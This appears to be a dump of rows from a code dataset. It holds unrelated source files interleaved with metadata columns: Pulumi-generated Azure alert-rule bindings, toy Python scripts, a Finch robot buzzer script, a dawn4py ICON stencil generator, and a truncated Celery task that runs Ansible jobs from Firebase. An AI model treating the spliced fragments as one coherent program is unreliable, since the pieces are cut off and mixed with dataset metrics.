description: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
frequency: Optional[pulumi.Input[int]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
query: Optional[pulumi.Input[str]] = None,
query_type: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
severity: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
throttling: Optional[pulumi.Input[int]] = None,
time_window: Optional[pulumi.Input[int]] = None,
trigger: Optional[pulumi.Input[pulumi.InputType['ScheduledQueryRulesAlertTriggerArgs']]] = None) -> 'ScheduledQueryRulesAlert':
"""
Get an existing ScheduledQueryRulesAlert resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['ScheduledQueryRulesAlertActionArgs']] action: An `action` block as defined below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] authorized_resource_ids: List of Resource IDs referred into query.
:param pulumi.Input[bool] auto_mitigation_enabled: Should the alerts in this Metric Alert be auto resolved? Defaults to `false`.
> **NOTE** `auto_mitigation_enabled` and `throttling` are mutually exclusive and cannot both be set.
:param pulumi.Input[str] data_source_id: The resource URI over which log search query is to be run.
:param pulumi.Input[str] description: The description of the scheduled query rule.
:param pulumi.Input[bool] enabled: Whether this scheduled query rule is enabled. Default is `true`.
:param pulumi.Input[int] frequency: Frequency (in minutes) at which rule condition should be evaluated. Values must be between 5 and 1440 (inclusive).
:param pulumi.Input[str] name: The name of the scheduled query rule. Changing this forces a new resource to be created.
:param pulumi.Input[str] query: Log search query.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the scheduled query rule instance.
:param pulumi.Input[int] severity: Severity of the alert. Possible values include: 0, 1, 2, 3, or 4.
:param pulumi.Input[int] throttling: Time (in minutes) for which Alerts should be throttled or suppressed. Values must be between 0 and 10000 (inclusive).
:param pulumi.Input[int] time_window: Time window for which data needs to be fetched for query (must be greater than or equal to `frequency`). Values must be between 5 and 2880 (inclusive).
:param pulumi.Input[pulumi.InputType['ScheduledQueryRulesAlertTriggerArgs']] trigger: The condition that results in the alert rule being run.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ScheduledQueryRulesAlertState.__new__(_ScheduledQueryRulesAlertState)
__props__.__dict__["action"] = action
__props__.__dict__["authorized_resource_ids"] = authorized_resource_ids
__props__.__dict__["auto_mitigation_enabled"] = auto_mitigation_enabled
__props__.__dict__["data_source_id"] = data_source_id
__props__.__dict__["description"] = description
__props__.__dict__["enabled"] = enabled
__props__.__dict__["frequency"] = frequency
__props__.__dict__["location"] = location
__props__.__dict__["name"] = name
__props__.__dict__["query"] = query
__props__.__dict__["query_type"] = query_type
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["severity"] = severity
__props__.__dict__["tags"] = tags
__props__.__dict__["throttling"] = throttling
__props__.__dict__["time_window"] = time_window
__props__.__dict__["trigger"] = trigger
return ScheduledQueryRulesAlert(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def action(self) -> pulumi.Output['outputs.ScheduledQueryRulesAlertAction']:
"""
An `action` block as defined below.
"""
return pulumi.get(self, "action")
@property
@pulumi.getter(name="authorizedResourceIds")
def authorized_resource_ids(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
List of Resource IDs referred into query.
"""
return pulumi.get(self, "authorized_resource_ids")
@property
@pulumi.getter(name="autoMitigationEnabled")
def auto_mitigation_enabled(self) -> pulumi.Output[Optional[bool]]:
"""
Should the alerts in this Metric Alert be auto resolved? Defaults to `false`.
> **NOTE** `auto_mitigation_enabled` and `throttling` are mutually exclusive and cannot both be set.
"""
return pulumi.get(self, "auto_mitigation_enabled")
@property
@pulumi.getter(name="dataSourceId")
def data_source_id(self) -> pulumi.Output[str]:
"""
The resource URI over which log search query is to be run.
"""
return pulumi.get(self, "data_source_id")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
The description of the scheduled query rule.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def enabled(self) -> pulumi.Output[Optional[bool]]:
"""
Whether this scheduled query rule is enabled. Default is `true`.
"""
return pulumi.get(self, "enabled")
@property
@pulumi.getter
def frequency(self) -> pulumi.Output[int]:
"""
Frequency (in minutes) at which rule condition should be evaluated. Values must be between 5 and 1440 (inclusive).
"""
return pulumi.get(self, "frequency")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the scheduled query rule. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def query(self) -> pulumi.Output[str]:
"""
Log search query.
"""
return pulumi.get(self, "query")
@property
@pulumi.getter(name="queryType")
def query_type(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "query_type")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the resource group in which to create the scheduled query rule instance.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter
def severity(self) -> pulumi.Output[Optional[int]]:
"""
Severity of the alert. Possible values include: 0, 1, 2, 3, or 4.
"""
return pulumi.get(self, "severity")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
return pulumi.get(self, "tags")
@property
@pulumi.getter
def throttling(self) -> pulumi.Output[Optional[int]]:
"""
Time (in minutes) for which Alerts should be throttled or suppressed. Values must be between 0 and 10000 (inclusive).
"""
return pulumi.get(self, "throttling")
@property
@pulumi.getter(name="timeWindow")
def time_window(self) -> pulumi.Output[int]:
"""
Time window for which data needs to be fetched for query (must be greater than or equal to `frequency`). Values must be between 5 and 2880 (inclusive).
"""
return pulumi.get(self, "time_window")
@property
@pulumi.getter
def trigger(self) -> pulumi.Output['outputs.ScheduledQueryRulesAlertTrigger']:
"""
The condition that results in the alert rule being run.
"""
return pulumi.get(self, "trigger")
| 46.455767 | 233 | 0.655562 | 4,834 | 41,485 | 5.444146 | 0.050683 | 0.098225 | 0.0953 | 0.045142 | 0.90717 | 0.890413 | 0.869476 | 0.850895 | 0.843751 | 0.830604 | 0 | 0.006785 | 0.239725 | 41,485 | 892 | 234 | 46.507848 | 0.827616 | 0.297553 | 0 | 0.788909 | 1 | 0 | 0.114781 | 0.051131 | 0 | 0 | 0 | 0 | 0 | 1 | 0.16458 | false | 0.001789 | 0.012522 | 0.0161 | 0.275492 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
00c5ffe09bfcc9560113bc1d449c4e37d205be9c | 153 | py | Python | python/python_crash_course/chapter_8/print_hello.py | lmonsalve22/Learning-to-Code | 2e32eba3fbd0bd63cc539e1e6d372ca346b765c9 | [
"MIT"
] | null | null | null | python/python_crash_course/chapter_8/print_hello.py | lmonsalve22/Learning-to-Code | 2e32eba3fbd0bd63cc539e1e6d372ca346b765c9 | [
"MIT"
] | null | null | null | python/python_crash_course/chapter_8/print_hello.py | lmonsalve22/Learning-to-Code | 2e32eba3fbd0bd63cc539e1e6d372ca346b765c9 | [
"MIT"
] | null | null | null |
def print_hello(name):
print(f'Hello {name.title()}')
def print_full_name(name, last_name):
print(f'Hello {name.title()} {last_name.title()}')
| 21.857143 | 54 | 0.673203 | 24 | 153 | 4.083333 | 0.333333 | 0.27551 | 0.204082 | 0.306122 | 0.489796 | 0.489796 | 0 | 0 | 0 | 0 | 0 | 0 | 0.130719 | 153 | 6 | 55 | 25.5 | 0.736842 | 0 | 0 | 0 | 0 | 0 | 0.394737 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0 | 0.5 | 1 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
00e8e03289f4958f24944f542d8f6f56ac2cbbd4 | 143 | py | Python | test/run/t291.py | timmartin/skulpt | 2e3a3fbbaccc12baa29094a717ceec491a8a6750 | [
"MIT"
] | 2,671 | 2015-01-03T08:23:25.000Z | 2022-03-31T06:15:48.000Z | test/run/t291.py | csev/skulpt | 9aa25b7dbf29f23ee8d3140d01a6f4353d12e66f | [
"MIT"
] | 972 | 2015-01-05T08:11:00.000Z | 2022-03-29T13:47:15.000Z | test/run/t291.py | csev/skulpt | 9aa25b7dbf29f23ee8d3140d01a6f4353d12e66f | [
"MIT"
] | 845 | 2015-01-03T19:53:36.000Z | 2022-03-29T18:34:22.000Z | print -3 % 2
print 3 % 2
print -3 % 3
print 3 % 3
print
print -3 % -2
print 3 % -2
print -3 % -3
print 3 % -3
print
print 0 % 1
print 0 % -1
| 9.533333 | 13 | 0.559441 | 32 | 143 | 2.5 | 0.15625 | 0.6 | 0.35 | 0.6 | 0.8875 | 0.8875 | 0.8875 | 0.8875 | 0.8875 | 0.8875 | 0 | 0.20202 | 0.307692 | 143 | 14 | 14 | 10.214286 | 0.606061 | 0 | 0 | 0.166667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 1 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 12 |
971ad884ab71f4b008cf17e6ca12d55127bd40a1 | 1,225 | py | Python | buzzer_test.py | raghunathreddyjangam/Python_finch2 | dc3bde4753071807a23c8a75b28909970be757d2 | [
"MIT"
] | null | null | null | buzzer_test.py | raghunathreddyjangam/Python_finch2 | dc3bde4753071807a23c8a75b28909970be757d2 | [
"MIT"
] | null | null | null | buzzer_test.py | raghunathreddyjangam/Python_finch2 | dc3bde4753071807a23c8a75b28909970be757d2 | [
"MIT"
] | null | null | null | # Car alarm
# The finch sounds an alarm, alternating high pitch sounds and
# flashing red abd blue lights, until its nose is turned up
from time import sleep
from finch import Finch
finch = Finch()
finch.led("#550000") # set the led to red
finch.finch_2_buzzer(3,880,60)
sleep(1.00)
finch.led("#005500") # set the led to blue
finch.finch_2_buzzer(3,493,60)
sleep(1.00)
finch.led("#000055") # set the led to red
finch.finch_2_buzzer(3,523,60)
sleep(1.00)
finch.led("#550055") # set the led to blue
finch.finch_2_buzzer(3,587,60)
sleep(1.00)
finch.led("#555500") # set the led to red
finch.finch_2_buzzer(3,659,60)
sleep(1.00)
finch.led("#005555") # set the led to blue
finch.finch_2_buzzer(3,698,60)
sleep(1.00)
finch.finch_2_buzzer(3,880,60)
sleep(1.00)
finch.led("#005500") # set the led to blue
finch.finch_2_buzzer(3,493,60)
sleep(1.00)
finch.led("#000055") # set the led to red
finch.finch_2_buzzer(3,523,60)
sleep(1.00)
finch.led("#550055") # set the led to blue
finch.finch_2_buzzer(3,587,60)
sleep(1.00)
finch.led("#555500") # set the led to red
finch.finch_2_buzzer(3,659,60)
sleep(1.00)
finch.led("#005555") # set the led to blue
finch.finch_2_buzzer(3,698,60)
sleep(1.00)
finch.halt()
finch.close()
| 21.875 | 62 | 0.72 | 245 | 1,225 | 3.502041 | 0.195918 | 0.174825 | 0.153846 | 0.237762 | 0.789044 | 0.789044 | 0.789044 | 0.789044 | 0.789044 | 0.789044 | 0 | 0.173994 | 0.127347 | 1,225 | 55 | 63 | 22.272727 | 0.628625 | 0.28 | 0 | 0.85 | 0 | 0 | 0.088812 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.05 | 0 | 0.05 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
97a293bb2f465bf411d90d18aee11e0362c723e3 | 20,787 | py | Python | dawn/test/integration-test/dawn4py-tests/ICON_laplacian_diamond_stencil.py | muellch/dawn | 4fd055df809ce920ca15ffc6137b2be2aed3a2dd | [
"MIT"
] | 20 | 2017-09-28T14:23:54.000Z | 2021-08-23T09:58:26.000Z | dawn/test/integration-test/dawn4py-tests/ICON_laplacian_diamond_stencil.py | muellch/dawn | 4fd055df809ce920ca15ffc6137b2be2aed3a2dd | [
"MIT"
] | 1,018 | 2017-10-09T13:55:47.000Z | 2022-03-14T13:16:38.000Z | dawn/test/integration-test/dawn4py-tests/ICON_laplacian_diamond_stencil.py | muellch/dawn | 4fd055df809ce920ca15ffc6137b2be2aed3a2dd | [
"MIT"
] | 20 | 2017-09-21T10:35:24.000Z | 2021-01-18T09:24:58.000Z | #!/usr/bin/env python
##===-----------------------------------------------------------------------------*- Python -*-===##
## _
## | |
## __| | __ ___ ___ ___
## / _` |/ _` \ \ /\ / / '_ |
## | (_| | (_| |\ V V /| | | |
## \__,_|\__,_| \_/\_/ |_| |_| - Compiler Toolchain
##
##
## This file is distributed under the MIT License (MIT).
## See LICENSE.txt for details.
##
##===------------------------------------------------------------------------------------------===##
"""Generate input for the ICON Laplacian stencil test. This is an alternative version of the diamond,
emulating an FD stencil on a FV mesh. This is the version used in operations, since it is expected
to offer second order convergence"""
import argparse
import os
import dawn4py
from dawn4py.serialization import SIR, AST
from dawn4py.serialization import utils as serial_utils
from google.protobuf.json_format import MessageToJson, Parse
def main(args: argparse.Namespace):
stencil_name = "ICON_laplacian_diamond_stencil"
gen_outputfile = f"{stencil_name}.cpp"
sir_outputfile = f"{stencil_name}.sir"
interval = serial_utils.make_interval(
AST.Interval.Start, AST.Interval.End, 0, 0)
body_ast = serial_utils.make_ast(
[
# fill sparse dimension vn vert using the loop concept
serial_utils.make_loop_stmt(
[serial_utils.make_assignment_stmt(
serial_utils.make_field_access_expr("vn_vert"),
serial_utils.make_binary_operator(
serial_utils.make_binary_operator(serial_utils.make_field_access_expr(
"u_vert", [True, 0]), "*", serial_utils.make_field_access_expr("primal_normal_x", [True, 0])),
"+", serial_utils.make_binary_operator(serial_utils.make_field_access_expr(
"v_vert", [True, 0]), "*", serial_utils.make_field_access_expr("primal_normal_y", [True, 0])),
),
"=")],
[AST.LocationType.Value(
"Edge"), AST.LocationType.Value("Cell"), AST.LocationType.Value("Vertex")]
),
# dvt_tang for smagorinsky
serial_utils.make_assignment_stmt(
serial_utils.make_field_access_expr("dvt_tang"),
serial_utils.make_reduction_over_neighbor_expr(
op="+",
init=serial_utils.make_literal_access_expr(
"0.0", AST.BuiltinType.Double),
rhs=serial_utils.make_binary_operator(
serial_utils.make_binary_operator(serial_utils.make_field_access_expr(
"u_vert", [True, 0]), "*", serial_utils.make_field_access_expr("dual_normal_x", [True, 0])),
"+", serial_utils.make_binary_operator(serial_utils.make_field_access_expr(
"v_vert", [True, 0]), "*", serial_utils.make_field_access_expr("dual_normal_y", [True, 0])),
),
chain=[AST.LocationType.Value("Edge"), AST.LocationType.Value(
"Cell"), AST.LocationType.Value("Vertex")],
weights=[serial_utils.make_literal_access_expr(
"-1.0", AST.BuiltinType.Double), serial_utils.make_literal_access_expr(
"1.0", AST.BuiltinType.Double), serial_utils.make_literal_access_expr(
"0.0", AST.BuiltinType.Double), serial_utils.make_literal_access_expr(
"0.0", AST.BuiltinType.Double)]
),
"=",
),
serial_utils.make_assignment_stmt(
serial_utils.make_field_access_expr("dvt_tang"), serial_utils.make_binary_operator(
serial_utils.make_field_access_expr("dvt_tang"), "*", serial_utils.make_field_access_expr("tangent_orientation")), "="),
# dvt_norm for smagorinsky
serial_utils.make_assignment_stmt(
serial_utils.make_field_access_expr("dvt_norm"),
serial_utils.make_reduction_over_neighbor_expr(
op="+",
init=serial_utils.make_literal_access_expr(
"0.0", AST.BuiltinType.Double),
rhs=serial_utils.make_binary_operator(
serial_utils.make_binary_operator(serial_utils.make_field_access_expr(
"u_vert", [True, 0]), "*", serial_utils.make_field_access_expr("dual_normal_x", [True, 0])),
"+", serial_utils.make_binary_operator(serial_utils.make_field_access_expr(
"v_vert", [True, 0]), "*", serial_utils.make_field_access_expr("dual_normal_y", [True, 0])),
),
chain=[AST.LocationType.Value("Edge"), AST.LocationType.Value(
"Cell"), AST.LocationType.Value("Vertex")],
weights=[serial_utils.make_literal_access_expr(
"0.0", AST.BuiltinType.Double), serial_utils.make_literal_access_expr(
"0.0", AST.BuiltinType.Double), serial_utils.make_literal_access_expr(
"-1.0", AST.BuiltinType.Double), serial_utils.make_literal_access_expr(
"1.0", AST.BuiltinType.Double)]
),
"=",
),
# compute smagorinsky
serial_utils.make_assignment_stmt(
serial_utils.make_field_access_expr("kh_smag_1"),
serial_utils.make_reduction_over_neighbor_expr(
op="+",
init=serial_utils.make_literal_access_expr(
"0.0", AST.BuiltinType.Double),
rhs=serial_utils.make_field_access_expr("vn_vert"),
chain=[AST.LocationType.Value("Edge"), AST.LocationType.Value(
"Cell"), AST.LocationType.Value("Vertex")],
weights=[serial_utils.make_literal_access_expr(
"-1.0", AST.BuiltinType.Double), serial_utils.make_literal_access_expr(
"1.0", AST.BuiltinType.Double), serial_utils.make_literal_access_expr(
"0.0", AST.BuiltinType.Double), serial_utils.make_literal_access_expr(
"0.0", AST.BuiltinType.Double)]
),
"=",
),
serial_utils.make_assignment_stmt(
serial_utils.make_field_access_expr("kh_smag_1"),
serial_utils.make_binary_operator(
serial_utils.make_binary_operator(
serial_utils.make_binary_operator(
serial_utils.make_field_access_expr("kh_smag_1"),
"*",
serial_utils.make_field_access_expr("tangent_orientation")),
"*",
serial_utils.make_field_access_expr("inv_primal_edge_length")), "+",
serial_utils.make_binary_operator(
serial_utils.make_field_access_expr("dvt_norm"),
"*",
serial_utils.make_field_access_expr("inv_vert_vert_length"))), "="),
serial_utils.make_assignment_stmt(serial_utils.make_field_access_expr("kh_smag_1"),
serial_utils.make_binary_operator(serial_utils.make_field_access_expr(
"kh_smag_1"), "*", serial_utils.make_field_access_expr("kh_smag_1"))),
serial_utils.make_assignment_stmt(
serial_utils.make_field_access_expr("kh_smag_2"),
serial_utils.make_reduction_over_neighbor_expr(
op="+",
init=serial_utils.make_literal_access_expr(
"0.0", AST.BuiltinType.Double),
rhs=serial_utils.make_field_access_expr("vn_vert"),
chain=[AST.LocationType.Value("Edge"), AST.LocationType.Value(
"Cell"), AST.LocationType.Value("Vertex")],
weights=[serial_utils.make_literal_access_expr(
"0.0", AST.BuiltinType.Double), serial_utils.make_literal_access_expr(
"0.0", AST.BuiltinType.Double), serial_utils.make_literal_access_expr(
"-1.0", AST.BuiltinType.Double), serial_utils.make_literal_access_expr(
" 1.0", AST.BuiltinType.Double)]
),
"=",
),
serial_utils.make_assignment_stmt(
serial_utils.make_field_access_expr("kh_smag_2"),
serial_utils.make_binary_operator(
serial_utils.make_binary_operator(
serial_utils.make_field_access_expr("kh_smag_2"),
"*",
serial_utils.make_field_access_expr("inv_vert_vert_length")),
"+",
serial_utils.make_binary_operator(
serial_utils.make_field_access_expr("dvt_tang"),
"*",
serial_utils.make_field_access_expr("inv_primal_edge_length"))), "="),
serial_utils.make_assignment_stmt(serial_utils.make_field_access_expr("kh_smag_2"),
serial_utils.make_binary_operator(serial_utils.make_field_access_expr(
"kh_smag_2"), "*", serial_utils.make_field_access_expr("kh_smag_2"))),
# currently not able to forward a sqrt, so this is technically kh_smag**2
serial_utils.make_assignment_stmt(
serial_utils.make_field_access_expr("kh_smag"),
serial_utils.make_binary_operator(serial_utils.make_field_access_expr("diff_multfac_smag"), "*",
serial_utils.make_fun_call_expr("math::sqrt",
[serial_utils.make_binary_operator(serial_utils.make_field_access_expr(
"kh_smag_1"), "+", serial_utils.make_field_access_expr("kh_smag_2"))])),
"="),
# compute nabla2 using the diamond reduction
serial_utils.make_assignment_stmt(
serial_utils.make_field_access_expr("nabla2"),
serial_utils.make_reduction_over_neighbor_expr(
op="+",
init=serial_utils.make_literal_access_expr(
"0.0", AST.BuiltinType.Double),
rhs=serial_utils.make_binary_operator(serial_utils.make_literal_access_expr(
"4.0", AST.BuiltinType.Double), "*", serial_utils.make_field_access_expr("vn_vert")),
chain=[AST.LocationType.Value("Edge"), AST.LocationType.Value(
"Cell"), AST.LocationType.Value("Vertex")],
weights=[
serial_utils.make_binary_operator(
serial_utils.make_field_access_expr(
"inv_primal_edge_length"),
'*',
serial_utils.make_field_access_expr(
"inv_primal_edge_length")),
serial_utils.make_binary_operator(
serial_utils.make_field_access_expr(
"inv_primal_edge_length"),
'*',
serial_utils.make_field_access_expr(
"inv_primal_edge_length")),
serial_utils.make_binary_operator(
serial_utils.make_field_access_expr(
"inv_vert_vert_length"),
'*',
serial_utils.make_field_access_expr(
"inv_vert_vert_length")),
serial_utils.make_binary_operator(
serial_utils.make_field_access_expr(
"inv_vert_vert_length"),
'*',
serial_utils.make_field_access_expr(
"inv_vert_vert_length")),
]
),
"=",
),
serial_utils.make_assignment_stmt(
serial_utils.make_field_access_expr("nabla2"),
serial_utils.make_binary_operator(
serial_utils.make_field_access_expr("nabla2"),
"-",
serial_utils.make_binary_operator(
serial_utils.make_binary_operator(serial_utils.make_binary_operator(serial_utils.make_literal_access_expr(
"8.0", AST.BuiltinType.Double), "*", serial_utils.make_field_access_expr("vn")), "*",
serial_utils.make_binary_operator(
serial_utils.make_field_access_expr(
"inv_primal_edge_length"),
"*",
serial_utils.make_field_access_expr(
"inv_primal_edge_length"))),
"+",
serial_utils.make_binary_operator(serial_utils.make_binary_operator(serial_utils.make_literal_access_expr(
"8.0", AST.BuiltinType.Double), "*", serial_utils.make_field_access_expr("vn")), "*",
serial_utils.make_binary_operator(
serial_utils.make_field_access_expr(
"inv_vert_vert_length"),
"*",
serial_utils.make_field_access_expr(
"inv_vert_vert_length"))))),
"=")
]
)
vertical_region_stmt = serial_utils.make_vertical_region_decl_stmt(
body_ast, interval, AST.VerticalRegion.Forward
)
sir = serial_utils.make_sir(
gen_outputfile,
AST.GridType.Value("Unstructured"),
[
serial_utils.make_stencil(
stencil_name,
serial_utils.make_ast([vertical_region_stmt]),
[
serial_utils.make_field(
"diff_multfac_smag",
serial_utils.make_field_dimensions_unstructured(
[AST.LocationType.Value(
"Edge")], 1
),
),
serial_utils.make_field(
"tangent_orientation",
serial_utils.make_field_dimensions_unstructured(
[AST.LocationType.Value("Edge")], 1
),
),
serial_utils.make_field(
"inv_primal_edge_length",
serial_utils.make_field_dimensions_unstructured(
[AST.LocationType.Value("Edge")], 1
),
),
serial_utils.make_field(
"inv_vert_vert_length",
serial_utils.make_field_dimensions_unstructured(
[AST.LocationType.Value("Edge")], 1
),
),
serial_utils.make_field(
"u_vert",
serial_utils.make_field_dimensions_unstructured(
[AST.LocationType.Value("Vertex")], 1
),
),
serial_utils.make_field(
"v_vert",
serial_utils.make_field_dimensions_unstructured(
[AST.LocationType.Value("Vertex")], 1
),
),
serial_utils.make_field(
"primal_normal_x",
serial_utils.make_field_dimensions_unstructured(
[AST.LocationType.Value("Edge"), AST.LocationType.Value(
"Cell"), AST.LocationType.Value("Vertex")], 1
),
),
serial_utils.make_field(
"primal_normal_y",
serial_utils.make_field_dimensions_unstructured(
[AST.LocationType.Value("Edge"), AST.LocationType.Value(
"Cell"), AST.LocationType.Value("Vertex")], 1
),
),
serial_utils.make_field(
"dual_normal_x",
serial_utils.make_field_dimensions_unstructured(
[AST.LocationType.Value("Edge"), AST.LocationType.Value(
"Cell"), AST.LocationType.Value("Vertex")], 1
),
),
serial_utils.make_field(
"dual_normal_y",
serial_utils.make_field_dimensions_unstructured(
[AST.LocationType.Value("Edge"), AST.LocationType.Value(
"Cell"), AST.LocationType.Value("Vertex")], 1
),
),
serial_utils.make_field(
"vn_vert",
serial_utils.make_field_dimensions_unstructured(
[AST.LocationType.Value("Edge"), AST.LocationType.Value(
"Cell"), AST.LocationType.Value("Vertex")], 1
),
),
serial_utils.make_field(
"vn",
serial_utils.make_field_dimensions_unstructured(
[AST.LocationType.Value("Edge")], 1
),
),
serial_utils.make_field(
"dvt_tang",
serial_utils.make_field_dimensions_unstructured(
[AST.LocationType.Value("Edge")], 1
),
),
serial_utils.make_field(
"dvt_norm",
serial_utils.make_field_dimensions_unstructured(
[AST.LocationType.Value("Edge")], 1
),
),
serial_utils.make_field(
"kh_smag_1",
serial_utils.make_field_dimensions_unstructured(
[AST.LocationType.Value("Edge")], 1
),
),
serial_utils.make_field(
"kh_smag_2",
serial_utils.make_field_dimensions_unstructured(
[AST.LocationType.Value("Edge")], 1
),
),
serial_utils.make_field(
"kh_smag",
serial_utils.make_field_dimensions_unstructured(
[AST.LocationType.Value("Edge")], 1
),
),
serial_utils.make_field(
"nabla2",
serial_utils.make_field_dimensions_unstructured(
[AST.LocationType.Value("Edge")], 1
),
),
],
),
],
)
# print the SIR
if args.verbose:
print(MessageToJson(sir))
# compile
code = dawn4py.compile(sir, backend=dawn4py.CodeGenBackend.CXXNaiveIco)
# write to file
print(f"Writing generated code to '{gen_outputfile}'")
with open(gen_outputfile, "w") as f:
f.write(code)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"-v", "--verbose", dest="verbose", action="store_true", default=False, help="Print the generated SIR",
)
main(parser.parse_args())
| 51.9675 | 152 | 0.493337 | 1,837 | 20,787 | 5.127926 | 0.095808 | 0.212527 | 0.288217 | 0.205945 | 0.851486 | 0.850955 | 0.836093 | 0.835881 | 0.829512 | 0.828662 | 0 | 0.008673 | 0.406504 | 20,787 | 399 | 153 | 52.097744 | 0.754884 | 0.052004 | 0 | 0.74221 | 0 | 0 | 0.074841 | 0.0116 | 0 | 0 | 0 | 0 | 0 | 1 | 0.002833 | false | 0 | 0.016997 | 0 | 0.01983 | 0.005666 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
8ae760495c84700608a6b43289df14d01ab87ede | 106 | py | Python | drivers/xarm/core/__init__.py | takuya-ki/wrs | f6e1009b94332504042fbde9b39323410394ecde | [
"MIT"
] | 62 | 2018-11-30T05:53:32.000Z | 2022-03-20T13:15:22.000Z | drivers/xarm/core/__init__.py | takuya-ki/wrs | f6e1009b94332504042fbde9b39323410394ecde | [
"MIT"
] | 35 | 2021-04-12T09:41:05.000Z | 2022-03-26T13:32:46.000Z | drivers/xarm/core/__init__.py | takuya-ki/wrs | f6e1009b94332504042fbde9b39323410394ecde | [
"MIT"
] | 43 | 2019-01-03T04:47:13.000Z | 2022-03-18T06:40:59.000Z | from .config.x_code import ControllerWarn, ControllerError, ServoError
from .config.x_config import XCONF
| 35.333333 | 70 | 0.849057 | 14 | 106 | 6.285714 | 0.642857 | 0.227273 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.09434 | 106 | 2 | 71 | 53 | 0.916667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
8ae8e69ef5d251329dd2635a03e5a08569a7ab7b | 6,462 | py | Python | dcelery/tasks.py | rackeric/destiny | 558360b8465bb8f1b89a9adc20e81a2648b93b9d | [
"Apache-2.0"
] | 2 | 2015-02-22T08:02:03.000Z | 2017-09-07T07:18:12.000Z | dcelery/tasks.py | rackeric/destiny | 558360b8465bb8f1b89a9adc20e81a2648b93b9d | [
"Apache-2.0"
] | null | null | null | dcelery/tasks.py | rackeric/destiny | 558360b8465bb8f1b89a9adc20e81a2648b93b9d | [
"Apache-2.0"
] | null | null | null | from firebase import FirebaseApplication, FirebaseAuthentication
#from firebase import Firebase
import firebase
from celery.decorators import task
from ansible import utils
import ansible.runner, json, os
@task()
def ansible_jeneric_testing(job_id):
# firebase authentication
SECRET = os.environ['SECRET']
authentication = FirebaseAuthentication(SECRET, True, True)
# set the specific job from firebase with user
URL = 'https://deploynebula.firebaseio.com/external_data/'
myExternalData = FirebaseApplication(URL, authentication)
# update status to RUNNING in firebase
myExternalData.patch(job_id, json.loads('{"status":"RUNNING"}'))
# finally, get the actual job
job = myExternalData.get(URL, job_id)
myHostList = job['host_list'] +','
myModuleName = job['module_name']
if (job['module_args']):
myModuleArgs = job['module_args']
else:
myModuleArgs = ''
myPattern = job['pattern']
myRemoteUser = job['remote_user']
myRemotePass = job['remote_pass']
#myKeyFile = job['private_key_file']
#tmpFile = open("/tmp/" + job_id, "w")
#tmpFile.write(myKeyFile)
